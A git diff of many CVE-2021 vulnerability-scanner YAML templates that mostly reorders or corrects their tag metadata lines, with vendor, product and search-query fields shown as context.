diff --git a/http/cves/2021/CVE-2021-27519.yaml b/http/cves/2021/CVE-2021-27519.yaml
index c1cd578062..75c155ee72 100644
--- a/http/cves/2021/CVE-2021-27519.yaml
+++ b/http/cves/2021/CVE-2021-27519.yaml
@@ -29,7 +29,7 @@ info:
vendor: fudforum
product: fudforum
shodan-query: 'http.html:"Powered by: FUDforum"'
- tags: xss,fudforum,edb,packetstorm,cve,cve2021
+ tags: cve2021,cve,xss,fudforum,edb,packetstorm
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-27520.yaml b/http/cves/2021/CVE-2021-27520.yaml
index 061740b7e1..2bf8beb336 100644
--- a/http/cves/2021/CVE-2021-27520.yaml
+++ b/http/cves/2021/CVE-2021-27520.yaml
@@ -29,7 +29,7 @@ info:
vendor: fudforum
product: fudforum
shodan-query: html:"FUDforum"
- tags: packetstorm,cve,cve2021,xss,fuddorum,edb,intrusive,fudforum
+ tags: cve2021,cve,packetstorm,xss,fuddorum,edb,intrusive,fudforum
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-27561.yaml b/http/cves/2021/CVE-2021-27561.yaml
index 4fc550b1df..d873903466 100644
--- a/http/cves/2021/CVE-2021-27561.yaml
+++ b/http/cves/2021/CVE-2021-27561.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: yealink
product: device_management
- tags: cve,cve2021,rce,yealink,mirai,kev
+ tags: cve2021,cve,rce,yealink,mirai,kev
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-27651.yaml b/http/cves/2021/CVE-2021-27651.yaml
index 6513fb4331..cb9e593009 100644
--- a/http/cves/2021/CVE-2021-27651.yaml
+++ b/http/cves/2021/CVE-2021-27651.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: pega
product: infinity
- tags: cve,cve2021,pega,auth-bypass
+ tags: cve2021,cve,pega,auth-bypass
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-27670.yaml b/http/cves/2021/CVE-2021-27670.yaml
index f1b2b50e8c..7dd7f8c114 100644
--- a/http/cves/2021/CVE-2021-27670.yaml
+++ b/http/cves/2021/CVE-2021-27670.yaml
@@ -26,7 +26,7 @@ info:
vendor: appspace
product: appspace
shodan-query: title:"Appspace"
- tags: cve,cve2023,appspace,ssrf
+ tags: cve,cve2021,appspace,ssrf
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-27748.yaml b/http/cves/2021/CVE-2021-27748.yaml
index b123a584c7..84fadd23ba 100644
--- a/http/cves/2021/CVE-2021-27748.yaml
+++ b/http/cves/2021/CVE-2021-27748.yaml
@@ -20,7 +20,7 @@ info:
verified: true
max-request: 2
shodan-query: http.html:"IBM WebSphere Portal"
- tags: cve,cve2021,hcl,ibm,ssrf,websphere
+ tags: cve2021,cve,hcl,ibm,ssrf,websphere
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-27905.yaml b/http/cves/2021/CVE-2021-27905.yaml
index c439ef861d..63c2750790 100644
--- a/http/cves/2021/CVE-2021-27905.yaml
+++ b/http/cves/2021/CVE-2021-27905.yaml
@@ -26,7 +26,7 @@ info:
max-request: 2
vendor: apache
product: solr
- tags: cve,cve2021,apache,solr,ssrf
+ tags: cve2021,cve,apache,solr,ssrf
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-27909.yaml b/http/cves/2021/CVE-2021-27909.yaml
index e23ef1650e..6b0d649380 100644
--- a/http/cves/2021/CVE-2021-27909.yaml
+++ b/http/cves/2021/CVE-2021-27909.yaml
@@ -26,7 +26,7 @@ info:
vendor: acquia
product: mautic
shodan-query: title:"Mautic"
- tags: cve,cve2021,mautic,xss,acquia
+ tags: cve2021,cve,mautic,xss,acquia
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-27931.yaml b/http/cves/2021/CVE-2021-27931.yaml
index a49d8b642b..a2cdc8113a 100644
--- a/http/cves/2021/CVE-2021-27931.yaml
+++ b/http/cves/2021/CVE-2021-27931.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: lumis
product: lumis_experience_platform
- tags: cve,cve2021,lumis,xxe,oast,blind
+ tags: cve2021,cve,lumis,xxe,oast,blind
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-28073.yaml b/http/cves/2021/CVE-2021-28073.yaml
index d7bb53e2e2..9da20c9cce 100644
--- a/http/cves/2021/CVE-2021-28073.yaml
+++ b/http/cves/2021/CVE-2021-28073.yaml
@@ -16,7 +16,7 @@ info:
cve-id: CVE-2021-28073
metadata:
max-request: 2
- tags: ntopng,cve,cve2021
+ tags: cve2021,cve,ntopng
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-28149.yaml b/http/cves/2021/CVE-2021-28149.yaml
index c48337bd2e..3de868f655 100644
--- a/http/cves/2021/CVE-2021-28149.yaml
+++ b/http/cves/2021/CVE-2021-28149.yaml
@@ -26,7 +26,7 @@ info:
max-request: 2
vendor: hongdian
product: h8922_firmware
- tags: cve,cve2021,hongdian,traversal
+ tags: cve2021,cve,hongdian,traversal
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-28150.yaml b/http/cves/2021/CVE-2021-28150.yaml
index fe1e46e957..ce5e3ff21e 100644
--- a/http/cves/2021/CVE-2021-28150.yaml
+++ b/http/cves/2021/CVE-2021-28150.yaml
@@ -25,7 +25,7 @@ info:
max-request: 2
vendor: hongdian
product: h8922_firmware
- tags: cve,cve2021,hongdian,exposure
+ tags: cve2021,cve,hongdian,exposure
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-28151.yaml b/http/cves/2021/CVE-2021-28151.yaml
index 55540a1df3..a7d22cdc93 100644
--- a/http/cves/2021/CVE-2021-28151.yaml
+++ b/http/cves/2021/CVE-2021-28151.yaml
@@ -26,7 +26,7 @@ info:
max-request: 2
vendor: hongdian
product: h8922_firmware
- tags: cve,cve2021,hongdian,rce,injection
+ tags: cve2021,cve,hongdian,rce,injection
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-28164.yaml b/http/cves/2021/CVE-2021-28164.yaml
index 5f8c879c09..486b8aa6be 100644
--- a/http/cves/2021/CVE-2021-28164.yaml
+++ b/http/cves/2021/CVE-2021-28164.yaml
@@ -28,8 +28,7 @@ info:
max-request: 2
vendor: eclipse
product: jetty
- tags: packetstorm,vulhub,cve,cve2021,jetty,exposure,eclipse
-flow: http(1) && http(2)
+ tags: cve2021,cve,packetstorm,vulhub,jetty,exposure,eclipse
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-28169.yaml b/http/cves/2021/CVE-2021-28169.yaml
index 0d02c8fcd4..a7e8357b97 100644
--- a/http/cves/2021/CVE-2021-28169.yaml
+++ b/http/cves/2021/CVE-2021-28169.yaml
@@ -28,7 +28,7 @@ info:
max-request: 2
vendor: eclipse
product: jetty
- tags: cve,cve2021,jetty,eclipse
+ tags: cve2021,cve,jetty,eclipse
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-28377.yaml b/http/cves/2021/CVE-2021-28377.yaml
index 9f55baae4e..71fb768847 100644
--- a/http/cves/2021/CVE-2021-28377.yaml
+++ b/http/cves/2021/CVE-2021-28377.yaml
@@ -25,7 +25,7 @@ info:
vendor: chronoengine
product: chronoforums
framework: joomla
- tags: cve,cve2021,chronoforums,lfi,joomla,chronoengine
+ tags: cve2021,cve,chronoforums,lfi,joomla,chronoengine
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-28419.yaml b/http/cves/2021/CVE-2021-28419.yaml
index f72cadac7c..d8025e0e49 100644
--- a/http/cves/2021/CVE-2021-28419.yaml
+++ b/http/cves/2021/CVE-2021-28419.yaml
@@ -28,7 +28,7 @@ info:
max-request: 3
vendor: seopanel
product: seo_panel
- tags: cve,cve2021,sqli,seopanel,auth,packetstorm
+ tags: cve2021,cve,sqli,seopanel,auth,packetstorm
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-28854.yaml b/http/cves/2021/CVE-2021-28854.yaml
index e6ba9a798e..f23147009d 100644
--- a/http/cves/2021/CVE-2021-28854.yaml
+++ b/http/cves/2021/CVE-2021-28854.yaml
@@ -15,7 +15,7 @@ info:
cve-id: CVE-2021-28854
metadata:
max-request: 1
- tags: cve,cve2021
+ tags: cve2021,cve,sqli
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-28918.yaml b/http/cves/2021/CVE-2021-28918.yaml
index 6126824d75..e8dfe9bd24 100644
--- a/http/cves/2021/CVE-2021-28918.yaml
+++ b/http/cves/2021/CVE-2021-28918.yaml
@@ -28,7 +28,7 @@ info:
vendor: netmask_project
product: netmask
framework: node.js
- tags: cve,cve2021,npm,netmask,ssrf,lfi,netmask_project,node.js
+ tags: cve2021,cve,npm,netmask,ssrf,lfi,netmask_project,node.js
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-28937.yaml b/http/cves/2021/CVE-2021-28937.yaml
index 51b9d11ea8..d7df04f1f2 100644
--- a/http/cves/2021/CVE-2021-28937.yaml
+++ b/http/cves/2021/CVE-2021-28937.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: acexy
product: wireless-n_wifi_repeater_firmware
- tags: cve,cve2021,acexy,disclosure,iot
+ tags: cve2021,cve,acexy,disclosure,iot
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-29006.yaml b/http/cves/2021/CVE-2021-29006.yaml
index a1089dbd75..87be9359e9 100644
--- a/http/cves/2021/CVE-2021-29006.yaml
+++ b/http/cves/2021/CVE-2021-29006.yaml
@@ -24,7 +24,7 @@ info:
vendor: rconfig
product: rconfig
shodan-query: http.title:"rConfig"
- tags: cve,cve2021,rconfig,authenticated,lfi
+ tags: cve2021,cve,rconfig,authenticated,lfi
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-29156.yaml b/http/cves/2021/CVE-2021-29156.yaml
index e45540813c..fbab5cb20d 100644
--- a/http/cves/2021/CVE-2021-29156.yaml
+++ b/http/cves/2021/CVE-2021-29156.yaml
@@ -25,7 +25,7 @@ info:
vendor: forgerock
product: openam
shodan-query: http.title:"OpenAM"
- tags: cve,cve2021,openam,ldap,injection,forgerock
+ tags: cve2021,cve,openam,ldap,injection,forgerock
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-29200.yaml b/http/cves/2021/CVE-2021-29200.yaml
index e11d376ac5..fce4143a21 100644
--- a/http/cves/2021/CVE-2021-29200.yaml
+++ b/http/cves/2021/CVE-2021-29200.yaml
@@ -24,7 +24,7 @@ info:
product: ofbiz
shodan-query: html:"OFBiz"
fofa-query: app="Apache_OFBiz"
- tags: cve,cve2021,apache,ofbiz,deserialization,rce
+ tags: cve2021,cve,apache,ofbiz,deserialization,rce
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-29203.yaml b/http/cves/2021/CVE-2021-29203.yaml
index 13403bdfb3..07289cd330 100644
--- a/http/cves/2021/CVE-2021-29203.yaml
+++ b/http/cves/2021/CVE-2021-29203.yaml
@@ -25,7 +25,7 @@ info:
max-request: 2
vendor: hp
product: edgeline_infrastructure_manager
- tags: hpe,cve,cve2021,bypass,tenable,hp
+ tags: cve2021,cve,hpe,bypass,tenable,hp
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-29441.yaml b/http/cves/2021/CVE-2021-29441.yaml
index 6f716582d3..80f4ac6719 100644
--- a/http/cves/2021/CVE-2021-29441.yaml
+++ b/http/cves/2021/CVE-2021-29441.yaml
@@ -33,7 +33,7 @@ info:
max-request: 2
vendor: alibaba
product: nacos
- tags: nacos,auth-bypass,cve,cve2021,alibaba
+ tags: cve2021,cve,nacos,auth-bypass,alibaba
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-29442.yaml b/http/cves/2021/CVE-2021-29442.yaml
index f14f9d1edf..7f6016432b 100644
--- a/http/cves/2021/CVE-2021-29442.yaml
+++ b/http/cves/2021/CVE-2021-29442.yaml
@@ -28,7 +28,7 @@ info:
max-request: 1
vendor: alibaba
product: nacos
- tags: nacos,auth-bypass,cve,cve2021,alibaba
+ tags: cve2021,cve,nacos,auth-bypass,alibaba
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-29484.yaml b/http/cves/2021/CVE-2021-29484.yaml
index 711f4ef84f..1e05ef3bd9 100644
--- a/http/cves/2021/CVE-2021-29484.yaml
+++ b/http/cves/2021/CVE-2021-29484.yaml
@@ -26,7 +26,7 @@ info:
vendor: ghost
product: ghost
framework: node.js
- tags: cve,cve2021,xss,ghost,node.js
+ tags: cve2021,cve,xss,ghost,node.js
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-29505.yaml b/http/cves/2021/CVE-2021-29505.yaml
index ac2146db3b..41c1c252fb 100644
--- a/http/cves/2021/CVE-2021-29505.yaml
+++ b/http/cves/2021/CVE-2021-29505.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: xstream_project
product: xstream
- tags: oast,vulhub,cve,cve2021,xstream,deserialization,rce,xstream_project
+ tags: cve2021,cve,oast,vulhub,xstream,deserialization,rce,xstream_project
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-29622.yaml b/http/cves/2021/CVE-2021-29622.yaml
index f7b5a2fc1d..915ea71d32 100644
--- a/http/cves/2021/CVE-2021-29622.yaml
+++ b/http/cves/2021/CVE-2021-29622.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: prometheus
product: prometheus
- tags: cve,cve2021,prometheus,redirect
+ tags: cve2021,cve,prometheus,redirect
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-29625.yaml b/http/cves/2021/CVE-2021-29625.yaml
index 84d12d8b23..cfd6b4b7a6 100644
--- a/http/cves/2021/CVE-2021-29625.yaml
+++ b/http/cves/2021/CVE-2021-29625.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: adminer
product: adminer
- tags: cve,cve2021,adminer,xss
+ tags: cve2021,cve,adminer,xss,sqli
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-3002.yaml b/http/cves/2021/CVE-2021-3002.yaml
index 651fe6842c..20da86c95a 100644
--- a/http/cves/2021/CVE-2021-3002.yaml
+++ b/http/cves/2021/CVE-2021-3002.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: "seopanel"
product: seo_panel
- tags: cve,cve2021,seopanel,xss
+ tags: cve2021,cve,seopanel,xss
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-30049.yaml b/http/cves/2021/CVE-2021-30049.yaml
index 2a1238a4e5..85b2034cae 100644
--- a/http/cves/2021/CVE-2021-30049.yaml
+++ b/http/cves/2021/CVE-2021-30049.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: sysaid
product: sysaid
- tags: cve,cve2021,xss,sysaid
+ tags: cve2021,cve,xss,sysaid
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-30128.yaml b/http/cves/2021/CVE-2021-30128.yaml
index 8033eb54c0..861a7ae9f9 100644
--- a/http/cves/2021/CVE-2021-30128.yaml
+++ b/http/cves/2021/CVE-2021-30128.yaml
@@ -29,7 +29,7 @@ info:
vendor: apache
product: ofbiz
fofa-query: app="Apache_OFBiz"
- tags: cve,cve2021,apache,ofbiz,deserialization,rce
+ tags: cve2021,cve,apache,ofbiz,deserialization,rce
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-30134.yaml b/http/cves/2021/CVE-2021-30134.yaml
index 66c52c1920..436cb27178 100644
--- a/http/cves/2021/CVE-2021-30134.yaml
+++ b/http/cves/2021/CVE-2021-30134.yaml
@@ -27,7 +27,7 @@ info:
vendor: php_curl_class_project
product: php_curl_class
google-query: inurl:"/php-curl-test/post_file_path_upload.php"
- tags: cve,cve2021,xss,php-mod,wpscan,php_curl_class_project
+ tags: cve2021,cve,xss,php-mod,wpscan,php_curl_class_project
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-30151.yaml b/http/cves/2021/CVE-2021-30151.yaml
index e4e982ff8d..563b213326 100644
--- a/http/cves/2021/CVE-2021-30151.yaml
+++ b/http/cves/2021/CVE-2021-30151.yaml
@@ -27,7 +27,7 @@ info:
vendor: contribsys
product: sidekiq
shodan-query: title:"Sidekiq"
- tags: cve,cve2021,xss,sidekiq,authenticated,contribsys
+ tags: cve2021,cve,xss,sidekiq,authenticated,contribsys
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-3017.yaml b/http/cves/2021/CVE-2021-3017.yaml
index 79f59fd4bd..9a282bb34f 100644
--- a/http/cves/2021/CVE-2021-3017.yaml
+++ b/http/cves/2021/CVE-2021-3017.yaml
@@ -23,7 +23,7 @@ info:
max-request: 1
vendor: intelbras
product: win_300_firmware
- tags: cve,cve2021,exposure,router,intelbras
+ tags: cve2021,cve,exposure,router,intelbras
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-30175.yaml b/http/cves/2021/CVE-2021-30175.yaml
index c8dd814852..b5771a9610 100644
--- a/http/cves/2021/CVE-2021-30175.yaml
+++ b/http/cves/2021/CVE-2021-30175.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: zerof
product: web_server
- tags: cve,cve2021,zerof,sqli
+ tags: cve2021,cve,zerof,sqli
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-3019.yaml b/http/cves/2021/CVE-2021-3019.yaml
index 03efdbf633..de4409eb36 100644
--- a/http/cves/2021/CVE-2021-3019.yaml
+++ b/http/cves/2021/CVE-2021-3019.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: lanproxy_project
product: lanproxy
- tags: cve,cve2021,lanproxy,lfi,lanproxy_project
+ tags: cve2021,cve,lanproxy,lfi,lanproxy_project
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-30213.yaml b/http/cves/2021/CVE-2021-30213.yaml
index 11f2357272..44b7b63f7d 100644
--- a/http/cves/2021/CVE-2021-30213.yaml
+++ b/http/cves/2021/CVE-2021-30213.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: eng
product: knowage
- tags: cve,cve2021,xss,knowage,eng
+ tags: cve2021,cve,xss,knowage,eng
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-30461.yaml b/http/cves/2021/CVE-2021-30461.yaml
index 79637b672c..eca7ec1ae7 100644
--- a/http/cves/2021/CVE-2021-30461.yaml
+++ b/http/cves/2021/CVE-2021-30461.yaml
@@ -27,7 +27,7 @@ info:
vendor: voipmonitor
product: voipmonitor
shodan-query: http.title:"VoIPmonitor"
- tags: cve,cve2021,rce,voipmonitor
+ tags: cve2021,cve,rce,voipmonitor
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-30497.yaml b/http/cves/2021/CVE-2021-30497.yaml
index e823d1d3b9..9624b7d4a4 100644
--- a/http/cves/2021/CVE-2021-30497.yaml
+++ b/http/cves/2021/CVE-2021-30497.yaml
@@ -27,7 +27,7 @@ info:
vendor: ivanti
product: avalanche
framework: windows
- tags: cve,cve2021,avalanche,traversal,lfi,ivanti,windows
+ tags: cve2021,cve,avalanche,traversal,lfi,ivanti,windows
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-31195.yaml b/http/cves/2021/CVE-2021-31195.yaml
index b3ece52f13..9f1ce47da0 100644
--- a/http/cves/2021/CVE-2021-31195.yaml
+++ b/http/cves/2021/CVE-2021-31195.yaml
@@ -27,7 +27,7 @@ info:
vendor: microsoft
product: exchange_server
shodan-query: http.title:"Outlook"
- tags: microsoft,exchange,owa,xss
+ tags: cve2021,cve,microsoft,exchange,owa,xss
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-31249.yaml b/http/cves/2021/CVE-2021-31249.yaml
index e2222896ad..7e00b8468c 100644
--- a/http/cves/2021/CVE-2021-31249.yaml
+++ b/http/cves/2021/CVE-2021-31249.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: chiyu-tech
product: bf-430_firmware
- tags: cve,cve2021,chiyu,crlf,iot,chiyu-tech
+ tags: cve2021,cve,chiyu,crlf,iot,chiyu-tech
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-31250.yaml b/http/cves/2021/CVE-2021-31250.yaml
index 6ae2efc722..8c844dda2e 100644
--- a/http/cves/2021/CVE-2021-31250.yaml
+++ b/http/cves/2021/CVE-2021-31250.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: chiyu-tech
product: bf-430_firmware
- tags: cve,cve2021,chiyu,xss,iot,intrusive,chiyu-tech
+ tags: cve2021,cve,chiyu,xss,iot,intrusive,chiyu-tech
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-3129.yaml b/http/cves/2021/CVE-2021-3129.yaml
index c36d14bfcc..2a550e68ca 100644
--- a/http/cves/2021/CVE-2021-3129.yaml
+++ b/http/cves/2021/CVE-2021-3129.yaml
@@ -26,7 +26,7 @@ info:
vendor: facade
product: ignition
framework: laravel
- tags: cve,cve2021,laravel,rce,vulhub,kev,facade
+ tags: cve2021,cve,laravel,rce,vulhub,kev,facade
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-31537.yaml b/http/cves/2021/CVE-2021-31537.yaml
index bea93f39fd..fdb7898681 100644
--- a/http/cves/2021/CVE-2021-31537.yaml
+++ b/http/cves/2021/CVE-2021-31537.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: sisinformatik
product: sis-rewe_go
- tags: cve,cve2021,xss,seclists,intrusive,sisinformatik
+ tags: cve2021,cve,xss,seclists,intrusive,sisinformatik
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-31589.yaml b/http/cves/2021/CVE-2021-31589.yaml
index a2f0244f3e..e5b6ca869e 100644
--- a/http/cves/2021/CVE-2021-31589.yaml
+++ b/http/cves/2021/CVE-2021-31589.yaml
@@ -29,7 +29,7 @@ info:
product: appliance_base_software
shodan-query: 'set-cookie: nsbase_session'
google-query: '"BeyondTrust" "Redistribution Prohibited"'
- tags: xss,packetstorm,cve,cve2021,beyondtrust,bomgar
+ tags: cve,cve2021,xss,packetstorm,beyondtrust,bomgar
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-31602.yaml b/http/cves/2021/CVE-2021-31602.yaml
index 3a97cf4665..d0693b2071 100644
--- a/http/cves/2021/CVE-2021-31602.yaml
+++ b/http/cves/2021/CVE-2021-31602.yaml
@@ -28,7 +28,7 @@ info:
vendor: hitachi
product: vantara_pentaho
shodan-query: Pentaho
- tags: spring,seclists,cve,cve2021,pentaho,auth-bypass,hitachi
+ tags: cve2021,cve,spring,seclists,pentaho,auth-bypass,hitachi
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-31682.yaml b/http/cves/2021/CVE-2021-31682.yaml
index 767d74446f..4900f8d786 100644
--- a/http/cves/2021/CVE-2021-31682.yaml
+++ b/http/cves/2021/CVE-2021-31682.yaml
@@ -27,7 +27,7 @@ info:
vendor: automatedlogic
product: webctrl
shodan-query: html:"/_common/lvl5/dologin.jsp"
- tags: cve,cve2021,webctrl,xss,packetstorm,automatedlogic
+ tags: cve2021,cve,webctrl,xss,packetstorm,automatedlogic
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-31755.yaml b/http/cves/2021/CVE-2021-31755.yaml
index fa6a7d1fa4..41856a1138 100644
--- a/http/cves/2021/CVE-2021-31755.yaml
+++ b/http/cves/2021/CVE-2021-31755.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: tenda
product: ac11_firmware
- tags: cve,cve2021,tenda,rce,oast,router,mirai,kev
+ tags: cve2021,cve,tenda,rce,oast,router,mirai,kev
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-31805.yaml b/http/cves/2021/CVE-2021-31805.yaml
index 961a9cee82..89398e2cc4 100644
--- a/http/cves/2021/CVE-2021-31805.yaml
+++ b/http/cves/2021/CVE-2021-31805.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: apache
product: struts
- tags: cve,cve2021,apache,rce,struts,struts2,intrusive
+ tags: cve2021,cve,apache,rce,struts,struts2,intrusive
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-31856.yaml b/http/cves/2021/CVE-2021-31856.yaml
index 6b47775a9f..abaeac5f45 100644
--- a/http/cves/2021/CVE-2021-31856.yaml
+++ b/http/cves/2021/CVE-2021-31856.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: layer5
product: meshery
- tags: sqli,cve,cve2021,layer5
+ tags: cve2021,cve,sqli,layer5
variables:
num: "999999999"
diff --git a/http/cves/2021/CVE-2021-31862.yaml b/http/cves/2021/CVE-2021-31862.yaml
index def4f41a73..c004833754 100644
--- a/http/cves/2021/CVE-2021-31862.yaml
+++ b/http/cves/2021/CVE-2021-31862.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: sysaid
product: sysaid
- tags: cve,cve2021,xss,sysaid
+ tags: cve2021,cve,xss,sysaid
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-32030.yaml b/http/cves/2021/CVE-2021-32030.yaml
index 3f0bf5ec92..d478a248e4 100644
--- a/http/cves/2021/CVE-2021-32030.yaml
+++ b/http/cves/2021/CVE-2021-32030.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: asus
product: gt-ac2900_firmware
- tags: cve,cve2021,asus,auth-bypass,router
+ tags: cve2021,cve,asus,auth-bypass,router
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-32172.yaml b/http/cves/2021/CVE-2021-32172.yaml
index c4f7cb7bb9..6a6ed7bbda 100644
--- a/http/cves/2021/CVE-2021-32172.yaml
+++ b/http/cves/2021/CVE-2021-32172.yaml
@@ -27,7 +27,7 @@ info:
max-request: 3
vendor: maianscriptworld
product: maian_cart
- tags: cve,cve2021,rce,unauth,maian,intrusive,maianscriptworld
+ tags: cve2021,cve,rce,unauth,maian,intrusive,maianscriptworld
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-32618.yaml b/http/cves/2021/CVE-2021-32618.yaml
index 7899550a8e..dd27d5de8f 100644
--- a/http/cves/2021/CVE-2021-32618.yaml
+++ b/http/cves/2021/CVE-2021-32618.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: flask-security_project
product: flask-security
- tags: cve,cve2021,redirect,flask,flask-security_project
+ tags: cve2021,cve,redirect,flask,flask-security_project
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-32682.yaml b/http/cves/2021/CVE-2021-32682.yaml
index 01b7f554f5..835f1cea86 100644
--- a/http/cves/2021/CVE-2021-32682.yaml
+++ b/http/cves/2021/CVE-2021-32682.yaml
@@ -27,7 +27,7 @@ info:
vendor: std42
product: "elfinder"
github: https://github.com/Studio-42/elFinder
- tags: cve,cve2021,elfinder,misconfig,rce,oss,std42
+ tags: cve2021,cve,elfinder,misconfig,rce,oss,std42
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-32789.yaml b/http/cves/2021/CVE-2021-32789.yaml
index 92a084ac9e..0e71169b41 100644
--- a/http/cves/2021/CVE-2021-32789.yaml
+++ b/http/cves/2021/CVE-2021-32789.yaml
@@ -29,7 +29,7 @@ info:
vendor: automattic
product: woocommerce_blocks
framework: wordpress
- tags: cve,cve2021,wordpress,woocommerce,sqli,wp-plugin,wp,wpscan,automattic
+ tags: cve2021,cve,wordpress,woocommerce,sqli,wp-plugin,wp,wpscan,automattic
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-32819.yaml b/http/cves/2021/CVE-2021-32819.yaml
index 2b30f83196..5327427ff1 100644
--- a/http/cves/2021/CVE-2021-32819.yaml
+++ b/http/cves/2021/CVE-2021-32819.yaml
@@ -28,7 +28,7 @@ info:
max-request: 1
vendor: squirrelly
product: squirrelly
- tags: cve,cve2021,nodejs,rce,oast,squirrelly
+ tags: cve2021,cve,nodejs,rce,oast,squirrelly
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-32820.yaml b/http/cves/2021/CVE-2021-32820.yaml
index 82c3a296f8..36c543042e 100644
--- a/http/cves/2021/CVE-2021-32820.yaml
+++ b/http/cves/2021/CVE-2021-32820.yaml
@@ -28,7 +28,7 @@ info:
vendor: express_handlebars_project
product: express_handlebars
framework: node.js
- tags: cve,cve2021,expressjs,lfi,xxe,express_handlebars_project,node.js
+ tags: cve2021,cve,expressjs,lfi,xxe,express_handlebars_project,node.js
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-32853.yaml b/http/cves/2021/CVE-2021-32853.yaml
index 4d5714e3cd..6c714948f6 100644
--- a/http/cves/2021/CVE-2021-32853.yaml
+++ b/http/cves/2021/CVE-2021-32853.yaml
@@ -27,7 +27,7 @@ info:
vendor: erxes
product: erxes
shodan-query: http.title:"erxes"
- tags: cve,cve2021,xss,erxes,oss
+ tags: cve2021,cve,xss,erxes,oss
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-3293.yaml b/http/cves/2021/CVE-2021-3293.yaml
index cf744fc8e7..f952babfc1 100644
--- a/http/cves/2021/CVE-2021-3293.yaml
+++ b/http/cves/2021/CVE-2021-3293.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: emlog
product: emlog
- tags: cve,cve2021,emlog,fpd
+ tags: cve2021,cve,emlog,fpd
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-33044.yaml b/http/cves/2021/CVE-2021-33044.yaml
index a8395d69f9..d86b884299 100644
--- a/http/cves/2021/CVE-2021-33044.yaml
+++ b/http/cves/2021/CVE-2021-33044.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: dahuasecurity
product: ipc-hum7xxx_firmware
- tags: dahua,cve,cve2021,auth-bypass,seclists,dahuasecurity
+ tags: cve2021,cve,dahua,auth-bypass,seclists,dahuasecurity
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-33221.yaml b/http/cves/2021/CVE-2021-33221.yaml
index e4bf9a8738..4b6b4fa59b 100644
--- a/http/cves/2021/CVE-2021-33221.yaml
